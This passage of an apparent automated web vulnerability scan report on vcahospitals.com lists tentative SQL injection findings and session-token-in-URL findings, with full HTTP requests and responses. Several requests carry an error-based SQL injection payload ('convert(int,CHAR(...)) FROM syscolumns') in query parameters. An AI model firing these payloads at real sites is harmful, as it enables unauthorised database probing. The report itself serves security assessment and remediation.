GET /main/offer?=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

3.2. http://www.vcahospitals.com/main/offer/

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Request

GET /main/offer/?=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

3.3. http://www.vcahospitals.com/main/offer/thank-you.html

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Request

GET /main/offer/thank-you.html?addr=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&city=3&date=1307084400&email=netsparker@example.com&fname=Ronald%20Smith&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=Ronald%20Smith&newmex=0&optin=3&other=3&petage=3&petname=Ronald%20Smith&pettype=3&phone=3&referer=3&state=3&submit=Get+FREE+Coupon&token=d3e0554c85710ed27c818f2709c92045&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=3&zip=3 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=q6464e4u36jv7t08dk3kqutf71
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:24 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3161
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

3.4. http://www.vcahospitals.com/tools/markers_sema.php

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Request

GET /tools/markers_sema.php?sema=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=gnrb178du6ouqlhertfrhhq1v7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:52 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 65
Content-Type: text/xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<markers>
</markers>

4. Session token in URL
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://www.vcahospitals.com/hanson/appt.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhan
son%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526ti
me1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

4.2. http://www.vcahospitals.com/hanson/offer.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526to
ken%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

4.3. http://www.vcahospitals.com/main/offer

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=B5F701EB-EA95-422D-924E-BCD921689D1E&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=595ca47f74a6874c96fd2cb4b94d5da9&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d2505B0C6-B6AA-4144-878F-54873D353284%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d917e022cccb7f727295d2ccceeb0579c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:14:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

4.4. http://www.vcahospitals.com/main/offer/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A6830C2B-D8F4-43F2-B95E-78C277FCCFF2&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d040e6353a7ea37e6930856fe2e96ffd3%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=a7e84c5a5824b2f3bfa388c2289ad10b&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d61B79C48-C062-46F9-ABB6-C9F2C04EB7C7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d577d155ccfdadada67e9689c8e906f7c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253d040e6353a7ea37e6930856fe2e96ffd3%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:13:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9fa7nr5r6l675dmq1d4gnmpmh2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

4.5. http://www.vcahospitals.com/main/offer/thank-you.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=89CA6527-34F5-44F5-9FE6-1408D41DED87&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=0a9f236de16091436621ac3ecb3014ab&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC5E58271-0599-4DCE-A64E-4093BAC4AD11%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d3f9b848b2f0d1b6547ef64f5b4be7af5%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d552C3BF2-B50A-4487-9212-B5A1CFEBF63B%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de47593670de12e47b4fa1e9df57adad6%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d79086EA1-6374-4E83-A33A-DCBB6D3E16CA%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253db15cfbc2e8b9d5050f6de59c6ed8b5b1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252fof
fer%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com
Pragma: no-cache
Content-Length: 3685

fname=&lname=&addr=&city=&state=AZ&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=31c82c3543a452dc1200540d59f0157f&guid=0AD96EEC-57E3-4BB0-B188-1922AB63F2B0&referer=&uri=h
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:10:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3161
Content-Type: text/html

